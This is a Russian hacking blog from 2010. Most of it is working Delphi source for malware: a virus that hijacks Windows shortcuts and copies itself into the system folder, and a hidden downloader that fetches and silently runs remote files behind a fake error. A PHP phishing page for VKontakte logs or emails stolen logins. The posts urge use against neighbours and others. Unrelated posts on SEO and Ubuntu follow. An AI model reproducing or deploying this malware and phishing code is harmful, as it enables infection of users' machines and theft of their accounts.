ADD ESI,EAX
INC ECX
IMUL EDX,ECX
MOV EDI,EDX
IMUL EDI,ESI
CMP ECX,DWORD PTR [n_length]
JNZ here
invoke wsprintf,ADDR Buffer2,ADDR fmtstr,esi,edi
invoke SetDlgItemText, hWin, 701, addr Buffer2
Generate endp

25.01.2010 21:17

Link Virus aka "Ужас Ярлыков"

Некоторые читатели могут спросить: "Что это такое и с чем его едят ?". Это вредоносная программа, которая поражает ярлыки - файлы с расширением ".lnk".
Идея заражения ярлыков базируется на изменении пути объекта ярлыка. Пример: ярлык ссылается на программу "C:program.exe",
а вирус меняет этот путь на свой (допустим, "C:virus.exe"), да так, что ярлык не теряет работоспособности,
т.к. старый путь сохраняется в виде параметров командной строки к вирусу, т.е. путь в ярлыке после заражения становится
"C:virus.exe C:program.exe". Вот примерно по такому сценарию будет написан код. Кстати, пользоваться будем Delphi, поэтому запускай ее!

Самые часто используемые ярлыки в системе находятся в Главном Меню и на Рабочем Столе. Именно с ярлыками этих папок мы будем работать.
Плюс папки Главного Меню состоит в том, что тут находится директория "Автозагрузка", и надеюсь ты понял, почему это хорошо.

Для работы с файлом ярлыка можно использовать обычные API функции для работы с файлами - структура файла ярлыка есть в интернете
(хорошее описание и пример на асме есть в 8-ом выпуске VX-журнала 29А), но есть путь легче - интерфейс IShellLink (MSDN),
который предназначен для работы с ярлыками. Полезными для нас будут функции GetPath, SetPath, GetIconLocation, SetIconLocation и SetArguments.
GetPath - получает путь к файлу, к которому указывает ярлык.
SetPath - записывает путь к файлу в ярлык.
GetIconLocation - получает путь к иконке ярлыка (если после создания ярлыка иконку не меняли и вместо неё используется иконка файла,
на который указывает ярлык, то этот путь будет пустым).
SetIconLocation - записывает путь к иконке в ярлык.
SetArguments - записывает аргументы командной строки в ярлык. Это очень важная функция - с ее помощью мы будем записывать в ярлык путь к жертве.

Начнем-с! Так как я люблю строить всякие схемы, вот схема работы вируса:

1) Получаем системную директорию.
2) Копируем себя туда (т.к. при заражении ярлыков используется путь к вирусу и путь этот должен быть постоянным,
а из-за того, что вирус может быть извлечен из архива каким-нибудь WinRar'ом во временную директорию и позже удален,
лучше поместить копию вируса в безопасное место и прописывать в ярлыках путь именно туда).
3) Заражаем ярлыки рабочего стола.
3.1) Получаем путь к рабочему столу функцией SHGetSpecialFolderLocation с параметром CSIDL_DESKTOPDIRECTORY.
3.2) Ищем все файлы в папке рабочего стола с расширением ".lnk".
3.3) Заражаем их!
3.3.1) Получаем путь к файлу, на который указывает ярлык.
3.3.2) Проверяем - если путь к иконке пустой, то меняем его на путь к файлу, на который указывает ярлык. Это приходится делать из-за того,
что при смене пути файла в ярлыке, автоматом сменится и иконка, и сменится она на вирусную. Зачем лишний раз палиться ?
3.3.3) Если путь к файлу такой-же, как и путь к копии вируса в системной директории, значит этот ярлык уже заражен.
А если нет, то записываем в ярлык путь к нашему вирусу, а также вместо аргумента вписываем путь к жертве.
3.3.4) Сохраняем!
4) Заражаем ярлыки главного меню.
4.1) Получаем путь к папке главного меню функцией SHGetSpecialFolderLocation с параметром CSIDL_COMMON_STARTMENU
(папка главного меню для всех пользователей).
4.2) Ищем все файлы и папки - т.к. в меню большинство ярлыков находятся в разных папках, нужно использовать рекурсию для поиска файлов.
4.3) Заражаем их!
4.4) Получаем путь к папке главного меню функцией SHGetSpecialFolderLocation с параметром CSIDL_STARTMENU
(папка главного меню для текущего пользователя).
4.5) Ищем все файлы и папки.
4.6) Заражаем их!
5) Проверяем - передали ли вирусу в качестве аргумента командной строки что-нибудь. Если это так, то запустим этот файл,
т.к. вся работа по заражению уже выполнена и можно запустить жертву (чтобы никто ничего не заподозрил :).
Также выполним полезную нагрузку - то, чем будет проявляться вирус: удалять файлы, качать с интернета файлы, выводить мессаджбокс с угрозами и т.д.

Ну а теперь после этого скромного плана приступим к шкодингу! Все основные функции вынесены в отдельные процедуры для удобочитаемости.

Создаем новый консольный проект и убираем из него строку {$APPTYPE CONSOLE} - объяснять не буду - обсуждалось уже не раз.
Секция uses должна выглядеть так:

uses
SysUtils, SHLObj, ActiveX, windows, comobj, shellapi;

Добавим раздел констант:

const
mask='*.lnk'; // маска для поиска ярлыков
mask2='*'; // маска для поиска всех файлов
sl=''; // понятно :)
targetext='.exe';
// расширение тех файлов, ярлыки к которым будут заражаться - это из-за того, что при заражении ярлыков к Exe-файлам,
// иконку сменить просто, но если ярлык будет указывать на файл html, например, то иконка будет неправильная;
// это можно решить, получая инфу об иконке из реестра, но ведь это урок для новичков :)
sysfile='GGG.exe';
// имя файла, которое будет присвоено вирусу в системной папке.

Не забываем несколько глобальных переменных:

var
PRes : PChar; // нужна для получения системной директории.
SysDir: string; // тут этот путь и будет храниться

Далее напишем основную процедуру для работы с ярлыками:

procedure LinkWork(fn:string); // как параметр, получаем путь к ярлыку
var
ShellObject: IUnknown; // эти 3 переменные
ShellLink: IShellLink; // нужны для работы
PersistFile: IPersistFile; // с ярлыком

FName: WideString; // переменная, которая хранит путь к файлу для работы с ярлыком

OldDir, Ics: array [0..MAX_PATH] of char; // массивы для хранения путей к файлу и иконке

pfd: TWIN32FINDDATA; // нужна для получения пути к файлу, на который указывает ярлык

a: integer; // нужна для получения пути к иконке
begin
CoInitializeEx(nil, 0); // инициализируем
ShellObject := CreateComObject(CLSID_ShellLink); // и создаем Com-объект
ShellLink := ShellObject as IShellLink;
PersistFile := ShellObject as IPersistFile;
FName := fn;
PersistFile.Load(PWChar(FName), 0); // загружаем в него ярлык
with ShellLink do
begin

GetPath(OldDir, MAX_PATH, pfd, 0); // получаем прежний путь к файлу
Shelllink.GetIconLocation(Ics, MAX_PATH, a); // получаем путь к иконке ярлыка

if (lowercase(extractfileext(string(OldDir))) = TargetExt) then // проверяем, имеет ли файл нужное
// нам расширение, если да, то:
begin

if string(Ics) = '' then // если путь к иконке пустой, значит иконка берется из самого файла,
// и при смене она заменится на вирусную, но нам этого не надо,
ShellLink.SetIconLocation(OldDir,0); // поэтому даем ярлыку иконку прежнего файла

if string(olddir)<>SysDir then // проверяем, заражен ли этот ярлык, если нет, то:
begin

SetPath(PChar(SysDir)); // записывем в ярлык путь к нашему вирусу,
SetArguments(pchar('"'+string(olddir)+'"')); // а как параметр командной строки, записываем путь к прежнему файлу
// т.к. в пути файла могут быть пробелы, в вирусе это вызовет проблемы
// поэтому лучше путь взять в кавычки

PersistFile.Save(PWChar(FName), False); // сохраняем иконку

end;
end;
end;
end;

Следующим шагом будет написание процедуры, которая будет искать ярлыки в папке рабочего стола и передавать путь к
найденным файлам процедуре LinkWork:

procedure DesktopWork;
var
IdList: PITEMIDLIST; // экземпляр структуры ITEMIDLIST

Path: array [0..MAX_PATH] of char; // хранит путь рабочего стола

F: TSearchRec; // нужна для хранения свойств найденного файла

p: string; // нужна для составления полного пути к ярлыку

h: cardinal; // хэндл поиска
begin
SHGetSpecialFolderLocation(0, CSIDL_DESKTOPDIRECTORY, IdList); // получаем путь к папке рабочего стола
SHGetPathFromIDList(IdList, Path); // и сохраняем его в массиве Path

p:=string(Path)+sl+mask; // составляем путь для поиска: Путь + '' + '*.lnk'

h:=FindFirst(p, faAnyFile and not faDirectory, F); // Ищем первый файл на рабочем столе, отвечающий маске поиска(расщирение "*.lnk"),
// Внимание следует обратить на 2-ой параметр функции - маска аттрибутов,
// которые должен иметь найденный файл:
// мы ищем все файлы(faAnyFile) и исключаем(and not) из них все папки (faDirectory).

if F.name <> '' then // если путь к найденному файлу не пуст, это значит что мы что-то нашли
begin

LinkWork(string(Path)+sl+F.name); // обрабатываем найденный ярлык

while FindNext(F) = 0 do // этот цикл работает, пока файлы, отвечающие маске не закончатся
LinkWork(string(Path)+sl+F.name); // обрабатываем найденный ярлык

end;

FindClose(h); // закрываем поиск
end;

Вот и готова часть кода, которая будет заражать ярлыки рабочего стола. Теперь напишем процедуру для рекурсивного поиска ярлыков :)

procedure rec_work(dir:string);
var
F: TSearchRec; // нужна для хранения свойств найденного файла

i: Integer; // хэндл поиска

fn: string; // нужна для хранения пути к найденному файлу
begin
Dir := Dir + sl; // добавляем к пути ''
i := FindFirst(Dir + '*', faAnyFile, F); // Ищем все файлы и папки
while i = 0 do
begin
fn := Dir + F.Name; // добавляем к пути имя найденного файла

if (F.Attr and faDirectory <> 0) then // проверяем - найденный объект - это файл или папка ?
begin
if (F.Name <> '') and (f.Name <> '.') and (f.Name <> '..') then // проверяем, не нашли ли мы бесполезные папки, если нет, то:
begin
rec_work(fn); // вызываем себя с новым путем
end;
end
else // а если все-таки нашли файл,
begin
if lowercase(extractfileext(fn+F.name)) = '.lnk' then // то сверяем расширение найденного файла,
LinkWork(fn); // и если оно соответствует расширению ярлыка, то обрабатываем этот файл.
end;
i := FindNext(F); // ищем следующий файл

end;

FindClose(i); // закрываем поиск

end;

Теперь пришло время для написания кода, ответственного за поиск и передачу параметров предыдущей функции:

procedure StartMenuWork;
var
IdList: PITEMIDLIST; // экземпляр структуры ITEMIDLIST
Path: array [0..MAX_PATH] of char; // хранит путь папки главного меню
begin

SHGetSpecialFolderLocation(0, CSIDL_COMMON_STARTMENU, IdList); // получим папку главного меню всех пользователей
SHGetPathFromIDList(IdList, Path); // и сохраняем ее в Path
rec_work(string(path)); // ищем в ней ярлыки

SHGetSpecialFolderLocation(0, CSIDL_STARTMENU, IdList); // получим папку главного меню текущего пользователя
SHGetPathFromIDList(IdList, Path); // и сохраняем ее в Path
rec_work(string(path)); // ищем в ней ярлыки

end;

Т.к. вирус должен как-то проявляться в системе жертвы, напишем процедуру, которая будет выполнятся, после заражения всех ярлыков!
Пример - она будет считать количество запусков вируса и сохранять в корень диска C:
Код простой, поэтому комментировать его не буду.

procedure PayLoad;
var
f:text;
i:integer;
begin
AssignFile(f, 'C:counter.txt');
if fileexists('C:counter.txt') then
begin
reset(f);
readln(f, i);
closefile(f);
erase(f);
inc(i);
AssignFile(f, 'C:counter.txt');
rewrite(f);
writeln(f,i);
end
else
begin
rewrite(f);
i:=1;
writeln(f, i);
end;
closefile(f);
end;

Финальный эпизод вируса - вызов всех основных процедур вируса. Между begin и end пишем:

PRes := StrAlloc(255); // выделим память для хранения строки
GetSystemDirectory(PRes, 255); // получаем путь к системной директории
SysDir := StrPas(PRes)+sl+sysfile; // добавляем к нему '' и имя файла

CopyFile(pchar(paramstr(0)), pchar(SysDir), true); // копируем файл вируса в системную папку;
// обрати внимание на последний параметр - если он true, то файл не перезаписывается,
// а если false, то перезаписывается; подробнее смотри на MSDN

DesktopWork; // обрабатываем ярлыки рабочего стола
StartMenuWork; // и главного меню

if paramcount>0 then // проверяем - если в качестве параметра командной строки было что-то передано,
// значит вирус был запущен уже из зараженного ярлыка и надо запустить прежний файл
begin
ShellExecute(0, nil, pchar(paramstr(1)), nil, nil, SW_SHOW); // запускаем его
PayLoad; // и выполняем полезную работу :)
end;

Как видишь, ничего сложного в его написании нет. Но это не финальная версия - код можно улучшить и изменить,
например пути рабочего стола и меню брать из реестра, работать с ярлыками обычными файловыми функциями и т.д.
Но так как это учебный код, он был написан для большего понимания, а не скорости и оптимизированности.

обсуждают 2

20.01.2010 21:47

Downloader, или "Трать трафик соседу, пока он не знает".

Думаю, всем когда-нибудь хотелось сделать западло соседу/другу/врагу (да, именно в этом порядке).
Что же мешает кодеру подпортить кому-то жизнь? Ничего! Сегодня мы этим и займемся.

Как гласят разные Вики и прочие, Даунлоадер (от англ. Download - скачивать) - софт, предназначеный для скрытой закачки файлов
на компьютер жертвы с последующим запуском. Файлы чаще всего закачиваются вредоносные,
вроде пинча, бэкдоров или просто вирусов, но что мешает поставить соседу с ограниченым трафом
на загрузку какую-нибудь мыльную оперу размером в 2 гига ? В общем, соседу будет чем заняться на досуге :)

Зверь состоит из двух частей - конфигуратора и, собственно, даунлоадера. Конфигуратор нужен для того,
чтобы без труда записать информацию о загрузках в даунлоадер. Запустить ЕХЕ - не сидеть в HEX-редакторе :)
Писать зверя мы будем на Object Pascal в среде Delphi. Выбран старый добрый паскаль из-зи своей простоты,
и переписать его на ассемблер или Си не составит труда, т.к. в основном, в коде используются функции Win32 API,
которые везде одинаковы.

В начале будем писать конфигуратор, потому-что это проще. Открывай Delphi, создавай новый консольный проект.
После секции Uses вписывай:

type
TDownloadInfo = record // структура заголовка информации о файле
l_link : byte; // длина ссылки
l_saveto : byte; // длина пути сохранения
run : byte; // запускать файл или нет? (0/1)
end;

Этим мы создаем собственный тип записи для хранения инфофрмации о загрузке. Далее объявляем константы:

const
cfg_name = 'main.cfg'; // имя файла конфигурации
down_name = 'Download3r.exe'; // имя даунлоадера для записи инфы

Т.к. запись инфы о загрузках будет производиться в сам исполняемый файл даунлоадера, он должен находится
в папке с конфигуратором и иметь имя, которое мы задали в секции констант. Также это касается и файла настроек.
Объявим нужны переменные:

var
down_file : TDownloadInfo; // экземпляр TDownloadInfo
FC : byte; // количество файлов
DownSize : integer; // размер даунлоадера
i : integer;
num_written : integer; // количество записанных байт
i2 : integer;
l1 : integer; // длина ссылки
l2 : integer; // длина пути
Sum : integer; // сумма длин всех ссылок, опций и т.д.
s : string;
s2 : string;
M_Link : array[1..255] of char; // массив для хранения ссылки
M_SaveTo : array[1..255] of char; // массив для хранения пути
cfgF : text; // файл конфигурации
DownF : file; // файл даунлоадера

Между begin и end вписываем весь код:

AssignFile(cfgF, cfg_name); // открываем файл
Reset(cfgF); // с опциями

AssignFile(DownF, down_name); // открываем файл -
Reset(DownF, 1); // даунлоадер

DownSize:=filesize(DownF); // получаем размер нашего зверя
Seek(DownF, DownSize); // и ставим указатель чтения в конец файла

readln(cfgF, FC); // считываем количество файлов
readln(cfgF); // пропуск строки

for i:=1 to FC do // в этом цикле обрабатываем настройки
begin // и записываем их в даунлоадер
Sum:=Sum+sizeof(down_file); // высчитываем общий размер данных
readln(cfgF, s); // считываем ссылку

l1:=length(s); // определяем ее длину
Sum:=Sum+l1;

for i2:=1 to l1 do
begin
M_Link[i2]:=s[i2]; // заносим в массив ссылку
end;

down_file.l_link:=length(s); // заносим в структуру TDownloadInfo длину ссылки

readln(cfgF, s2); // считываем путь файла
l2:=length(s2); // определяем его длину
Sum:=Sum+l2;

for i2:=1 to l2 do
begin
M_SaveTo[i2]:=s2[i2]; // заносим в массив путь файла
end;

down_file.l_saveto:=length(s2);// заносим в структуру TDownloadInfo длину пути

readln(cfgF, down_file.run); // считываем в структуру флаг запуска
readln(cfgF); // пропуск строки

writeln('link #'+inttostr(i)+' is '+s); // это
writeln('file #'+inttostr(i)+' is '+s2); // что-то

if down_file.run=1 // вроде
then
writeln('file #'+inttostr(i)+' will be launched') // пользовательского
else
writeln('file #'+inttostr(i)+' will NOT be launched'); // интерфейса

writeln;
writeln;

BlockWrite(DownF, down_file, sizeof(down_file), num_written); // записываем структуру TDownloadInfo
BlockWrite(DownF, M_Link, l1, num_written); // записываем ссылку
BlockWrite(DownF, M_SaveTo, l2, num_written); // записываем путь к файлу

end;

Sum:=Sum+sizeof(fc)+sizeof(Sum); // высчитываем полный размер всех данных

BlockWrite(DownF, FC, 1, num_written); // записываем количество файлов
BlockWrite(DownF, Sum, 4, num_written); // записываем размер всех данный

CloseFile(downF); // закрываем файл даунлоадера
CloseFile(cfgF); // и конфигурации

writeln('Finished! Press enter to exit!'); // вот и конец!
readln;

Структура файла конфигурации такова:

[количество файлов для загрузки]
........
[ссылка]
[путь для сохранения]
[запускать(0/1)]
.......

Пример:

3

http://s12.ucoz.net/a/15/1688.jpg
C:4.jpg
0

http://s12.ucoz.net/a/15/1689.jpg
C:5.jpg
0

http://s12.ucoz.net/a/15/1690.jpg
C:6.jpg
1

А теперь займемся самим даунлоадером. Создавай новый консольный проект, и убирай из него вот это:

{$APPTYPE CONSOLE}

Отступ для совсем новичков в Delphi - эта строка отвечает за то, будет ли у программы свое консольное окно.
Т.к. мы пишем злой код, лишние проявления зверя ни к чему, поэтому уберем окно и будем работать, как
меткий снайпер - "без шума и пыли".

Секция Uses должна выглядеть таким образом:

uses
SysUtils, wininet, windows, shellapi;

wininet - нам нужен для доступа к интернет-функциям;
shellapi - нужен для функции ShellExecute;

Далее объявляем уже знакомую структуру:

type
TDownloadInfo = record // структура заголовка информации о файле
l_link : byte; // длина ссылки
l_saveto : byte; // длина пути сохранения
run : byte; // запускать файл или нет? (0/1)
end;

Далее создадим функцию загрузки файла:

function DownloadFile(const fileURL, FileName: string): boolean;
const
BufferSize = 1024; // размер буфера загрузки

var
hSession, hURL: HInternet; // хэндлы интернет сессии и урл-сессии
Buffer: array[1..BufferSize] of Byte; // сам буфер
BufferLen: DWORD; // думаю понятно
f: file; // файл, куда будем сохранять скачанные данные
sAppName: string; // юзер-агент

begin

sAppName := 'system32.exe'; // таким агентом мы представляемся в нете. хотя кого заботит это?

hSession := InternetOpen(PChar(sAppName), INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
// открываем интернет-сессию для доступа в сеть

hURL := InternetOpenURL(hSession, PChar(fileURL), nil, 0, 0, 0); // открываем урл-сессию

AssignFile(f, FileName); // создаем (перезаписываем)
Rewrite(f,1); // файл, куда будет скачиватся информация

repeat

InternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen); // скачиваем в буфер кусок данных
BlockWrite(f, Buffer, BufferLen); // и записываем его в файл

until BufferLen = 0; // пока файл не кончится - тоесть пока не будет прочтено 0 байт

CloseFile(f); // закрываем файл

InternetCloseHandle(hURL); // закрываем урл-сессию
InternetCloseHandle(hSession); // закрываем интернет-сессию

result:=true;
end;

Описание интернет-функций можно найти на сайте мелкомягких http://msdn.microsoft.com
Объявляем нужные переменные:

var
fn : string; // тут будет хранится путь к себе
s : string;
hndl : thandle; // хендл себя :)
fc : byte; // свой хендл - для чтения опций загрузки
i : integer;
fs : integer;
i2 : integer;
num_read : cardinal; // сюда будет попадать кол.-во прочитаных байт
Sum : integer; // общая длина путей и ссылок - нужна для чтения опций загрузки
down_file : TDownloadInfo; // экземпляр TDownloadInfo
M_Link : array[1..255] of char; // массив для хранения ссылки файла
M_SaveTo : array[1..255] of char; // массив для хранения пути для сохранения файла

Между begin и end пишем:

s:=GetCommandLine; // используя эту АПИ-функцию получаем путь к себе - аналог Application.ExeName

for i:=1 to length(s) do
begin // Так как эта АПИ получает путь с кавычками,
if s[ i ]<>'"' then // их нужно убрать.
fn:=fn+s[ i ]; // Что и происходит в этом цикле.
end;

hndl := CreateFile(pchar(fn), GENERIC_READ, // открываем себя для доступа к данным о загрузках
FILE_SHARE_READ, nil, OPEN_EXISTING, // все параметры - открытие только для чтения
FILE_ATTRIBUTE_NORMAL,0);

fs:=GetFileSize(hndl,nil); // сохраняем в переменную fs размер себя

SetFilePointer(hndl, fs-5, nil, FILE_BEGIN);
// этой АПИ мы ставим позицию
// для чтения файла в положение - за 5 байт до конца файла
// так как последние 5б файла это:
// - кол.-во файлов (1б)
// - размер всех путей и и ссылок вместе с опциями

ReadFile(hndl, fc, sizeof(fc), num_read, nil); // читаем количество файлов для загрузки
ReadFile(hndl, Sum, sizeof(Sum), num_read, nil); // читаем размер всех путей и и ссылок вместе с опциями

SetFilePointer(hndl, fs-sum, nil, FILE_BEGIN);
// ставим указатель в место, где начинаются структуры файлов для загрузки

for i:=1 to fc do // в этом цикле происходит чтение данных и их обработка
begin
ReadFile(hndl, down_file, sizeof(down_file), num_read, nil); // считываем структуру TDownloadInfo

ReadFile(hndl, M_Link, down_file.l_link, num_read, nil); // считываем ссылку к файлу длиной в down_file.l_link

ReadFile(hndl, M_SaveTo, down_file.l_saveto, num_read, nil); // считываем путь к файлу длиной в down_file.l_saveto

DownloadFile(M_Link, M_SaveTo); // загружаем файл с интернета

if down_file.run=1 then // если параметр=1 значит запустим файл!
begin
s:='';

for i2:=1 to down_file.l_saveto do // этим циклом мы
s:=s+M_SaveTo[i2]; // присваиваем переменной s путь к фалу

ShellExecute(0, 'open', pchar(s), '', '', SW_HIDE); // запускаем файл!

end;
end;

CloseHandle(hndl); // закрываем себя

// т.к. у жертвы могут появится подозрения, что "ломалка почты" даже не появилась на экране,
// вызовем ошибку "Деление на ноль"

i2:=0;
i:=1 div i2;

// чтобы дельфи не соптимизировала деление на ноль,
// сделаем вид что переменая i нам очень нужна
writeln(i);

Вобщем, вот таким вот нехитрым способом можно заставить отслюнявить соседа пол зарплаты за скачаную Санта-Барбару (все 158 сезонов).
Код чисто учебный, т.к. нет проверок на кривые хендлы и т.д. Но код можно здорово усовершенстовать,
прикрутив добавление файлов в автозагрузку, копирование в системные папки и еще кучу всего.
Было бы желание и прямые руки. Все это я оставляю на тебя - думай и совершенствуй.
Для желающих создать мультифункционального монстра, советую сайт http://delphisources.ru. Там много всего.

Ну а для ленивих, я загрузил оба проекта - их осталось только скомпилить.
http://vazonez.at.ua/publications/downloader.zip

обсуждают 2

17.01.2010 17:23

Фейк с авторизацией.

Я думаю читатели сего блога уже хорошо усвоили как сделать простой фейк. Задачей этого урока будет усложнение конструкции фейка с целью авторизации под введенным логином и паролем. Плюс будет рассмотрено несколько интересных функций php.

Я не буду вдаваться в подробности создания фейка, более подробно я остановлюсь на файле base.php. Про то, как создать простой фейк узнаете из 1ого моего урока. Помимо файла base.php у нас появится файл config.php, как видно из названия в нем будут хранится настройки. Вот его содержание:

<?
$filesend=true; //записывать ли в файл введенные логин и пароль, соответственно два значения truе - да и false-нет
$mailsend=false; //отправлять ли пароль и логин на мыло, также два значения

$writefile="base.txt"; //имя файла в который будет производится запись данных

$mail_mailto="yourmail@yourdomen.ru"; //ваша почта, куда будет отправлены логин и пароль
$mail_subject="пассы" //тема письма

?>

Примечание: Отправка на email работает не на всех хостингах, в основном только на платных.

Теперь перейдем непосредственно к содержанию файла log.php:

<?
require_once("config.php"); // подгружаем настройки фейка

$email = (@$_POST['email']); //присваиваем переменным
$pass = (@$_POST['pass']); //значение полей email и pass

if($email=="" or $pass=="") //Если поля логин и пароль пустые
{
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=login.php'></head></html>"; //то отправляем юзера на страницу с ошибкой входа.

} else { //Если это не так, поля логин и пароль не пустые, тогда

if($filesend==true){ //если в вайле конфиг запись в вайл=true, то
$file = fopen ("$writefile","a+");
$log = "$email;$passrn";
fwrite ( $file, $log) ; //записываем введенные данные в вайл base.txt
fclose ($file);
}

if($mailsend==true){ //Если отправка на mail включена
mail($mail_mailto, $mail_subject, '$email;$pass'); //Отправляем на mail логин и пароль
}

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru/login.php?email=$email&pass=$pass'></head></html>"; } //и перенаправляем //юзера на страницу вконтакте, если логин и пароль верны, то пользователя кинет на его страницу вконтакте.

?>

Вот вроде и все, мой фейк найдете здесь: http://vcantakte.freehostia.com/

P.S. Можно написать обработчик форм на JavaScripte (спасибо horiz), который будет проверять есть ли текст в полях логин и пароль, если нет высвечивает соответствующее сообщение:

<sсriрt>
function checkForm(form){
if(form.login.value!="" && form.pass.value!=""){form.submit();}
else{alert("Заполнены не все поля");}
}
</sсriрt>

<form name="Auth" method="post" action="log.php">
<input type="text" class="long" size="10" name="login" tabindex="1" value="" />
<input type="password" class="long" size="15" name="pass" tabindex="3">
<span class="ncc"><a href="jаvаsсript:document.login.submit()" onClick="checkForm(document.Auth)">Вход</a></span>
</form>

обсуждают 5

12.01.2010 19:54

Подготовка к созданию сайта

Итак вы решили создать сайт. Ну что же, давно пора :) Однако прежде чем создавать его сядьте и немного подумайте. Многие начинающие веб мастера думают, что все размышления о раскрутке интернет проекта будут уместны уже потом, после того как сам проект будет создан. Это в корне не верно. Начинать нужно заранее. Во первых продумайте контент, т.е. ту информацию, которая будет у вас на сайте, зайдите в поисковые системы и оцените, есть ли конкуренция по данной тематике и насколько она велика.

Затем подготовьте материалы. Продумайте, какая информация будет выложена у вас на сайте. Подбирая материал, подумайте о том, чтобы его не было слишком мало. Интернет проект, претендующий на то, чтобы стать популярным, должен состоять как минимум из нескольких сотен страниц. С меньшим объемом контента сложно рассчитывать на серьезные успехи в поисковых машинах. Да и пользователь случайно забредший к вам на сайт, вряд ли будет находиться там долго, если все, что вы сможете ему предложить - это десяток страниц текста. Итак начать нужно с того, что продумайте качество и количество контента.

Далее необходимо продумать по каким ключевым словам пользователь будет находить ваш сайт? На яндексе есть сервис предоставляющий возможность веб мастеру оценить популярность поисковых запросов. Например, когда я перед созданием своего портала Портал InternetCity ввел запрос на популярность ключевого слова культуризм, то получил, что за прошедший месяц это слово запрашивалось в Яндексе около 1500 раз. А вот словосочетания "культуризм грудь" спрашивалось только 6 раз. Догадываетесь куда я клоню, к необходимости оптимизировать текст на ваших страницах, так, чтобы пользователь мог вас найти. Например я счел, оптимизировать страницы моего портала под словосочетание "культуризм грудь" смысла не имеет, так как дополнительные 6 посетителей в месяц мне погоду не сделают, а вот оптимизировать под слово культуризм страницы нужно. Кстати по этому слову мой портал будет где то в первой тройке.

Старайтесь продумать все основные ключевые слова, по которым ваш сайт будут находить в поисковых запросах. В последствии это сбережет вам массу времени. Чтобы вы лучше поняли о чем идет речь приведу еще такой пример: Как я уже писал, я оптимизировал свой сайт под ряд ключевых запросов, одним из которых был культуризм, а вот оптимизировать под слово бодибилдинг (надеюсь ни кому не нужно объяснять что это такое) не догадался и уже после создания сайта проверив популярность этого слова, выяснил, что оно ищется пользователями поисковиков в 4 раза чаще, чем слово культуризм.

Следовательно мне сейчас придется думать о том, как оптимизировать еще свои страницы и по этому слову, значит нужно расширить портал, внести исправления в уже существующий текст, закачать все исправленное и переделанное на сервер и т.д. Одним словом потратить кучу времени. А все это по тому, что я вовремя не подумал о том, что ключевое слово бодибилдинг популярно в рунете.
Привык все время говорить культуризм да культуристы, а заморское словечко бодибилдинг в моем лексиконе не прижилось, а зря, мог бы себе немало времени сэкономить.

Итак контент подобран, ключевые слова тоже, дизайн сайта продуман, пора приступать непосредственно к его созданию. Я не буду здесь писать о том как вам создать дизайн сайта, это тема отдельной статьи. Здесь мы поговорим только об оптимизации страниц для поисковых систем. Прежде чем начинать сайтотворчество не забудьте зайти на Рамблер, Яндекс и Апорт и почитать что нужно сделать, а чего не надо делать для того, чтобы поисковый робот вас смог найти.

Итак, что нужно сделать для того, чтобы вашу страницу легко можно найти.

Заходим в Яндекс и читаем: Необходимо задавать уникальные заголовке в теге title, но не более 20-25 слов. К слову сказать на моем портале каждый заголовок уникален. Не стремитесь писать в заголовках название своего сайта, в заголовке вы должны отразить краткое содержание каждой страницы. Например: Индексация сайта в поисковых машинах. Что нужно знать для поисковой индексации. Давайте каждому документу описание в тэге description Собственно говоря не все поисковые машины учитывают этот тег, но тем не менее некоторые выводят его как краткое описание сайта при выдачи поискового запроса. Само собой описание в этом теге также должно быть уникальным для каждой странички.

Не забывайте о ключевых словах, по возможности уникальных для каждой страницы в теге Keywords. Однако используйте в этом теге только те слова, которые встречаются в тексте страницы. Делайте подписи к картинкам в тэге alt. Поисковым системам важно: есть ли искомое слово на странице документа, насколько часто оно в нем повторяется, промежутки между ключевыми словами, вес каждого слова.

О весе слова нужно поговорить особо, слово набранное в теге alt будет иметь меньший вес по сравнению со словами в тексте документа, а вот слово набранное в теге title или используемое в гиперссылках будет иметь больший вес. Также некоторый приоритет имеют слова, заключенные тегами H, B. Наличие искомого слова в теге Keywords также повышает его значимость, но лишь в том случае если это же слово присутствует и в тексте документа. Если же такого слова в тексте документа нет, а присутствует только в мета теге, то поисковая система эту страницу в результате поиска скорее всего вообще не покажет. Играет также значение месторасположение слова, чем ближе оно к вершине документа, тем больший вес будет иметь. К примеру слово культуризм расположенное в начале странице на моем портале имеет гораздо больший вес, чем слово культуризм расположенное всередине страницы.

Конечно поисковая оптимизация страниц вашего сайта сильно замедлит работу по его созданию, но не оптимизировав страницы практически невозможно будет добиться каких-нибудь серьезных результатов в поисковиках и следовательно раскрутить ваш ресурс, а раз так, то возникает вопрос, зачем его вообще создавать.

08.01.2010 20:20

Linux

Первое с чего надо начать это что такое Linux и для чего он мне нужен?
Linux - http://ru.wikipedia.org/wiki/Linux

А нужен Linux для нескольких важных целей....
1)Изучение структуры и работы Linux
2)Если вы будете ездить в европу с вашим ноутбуком там где установлена пиратская винда с вас могут взять огромный штраф и вплоть до срока
(С моего друга в Америке взяли штраф 400$ за то что его поймали в супермарките! с пиратской виндой)
3)Перед вами сразу откроется огромный прастор в плане хакерского ПО.
4)Большая часть сис админов уже сидит под такими видами ОС как Rad Hat, Mandriva , Ubuntu Server итд... так что игнорировать Linux мы больше не в состоянии....

Ubuntu 8.10

На момент написания этого урока 8.10 является самой новой версией Ubuntu....
скачать которую можно c официального сайта....
http://www.ubuntu.com/getubuntu/download
Весит эта ОС 700 МБ
Преимущество заключается в том что эта операционная система предназначена для начинающих пользователей Linux , но это не значит , что ей пользуются только новички....она сама по себе очень удобна и легка в установке.
Что самое главное вы можете установить Ubuntu прямо под виндой! (открыв скачанный архив .iso ) а там должен лежать файл wubi.exe
Открываете его.... после чего вы можете с лёгкостью установить Ubuntu (Разобраться как это сделать вы сможете)
//Лично я ставил Ubuntu как основную ось а на неё наложил уже Windows XP как это сделать будет описано ниже.
После того как вы успешно установили Ubuntu при перезагрузке компьютера у вас будет несколько вариантов
1)Ubuntu 8.10
2)Windows XP - Vista (ну или что там у вас ^^)
Ну и выбираете вариант 1 загружаетесь под Ubuntu выбираете второй под XP...

-------------------------------------------------------------------------------------------------------------------------------------------
Для тех кто выбрал Ubuntu как основную ось....после того как вы установили её у вас возникнет вопрос....как же быть с моим принтером или CS (контра)?
Решение есть.....
VirtualBox - это бесплатная программа которая позволяет создавать виртуальные машины в основной ОС
http://www.virtualbox.org/wiki/Linux_Downloads
//привыкайте что в Linux нет платных программ.....(платный аналог, но уже под Windows vmware workstation)
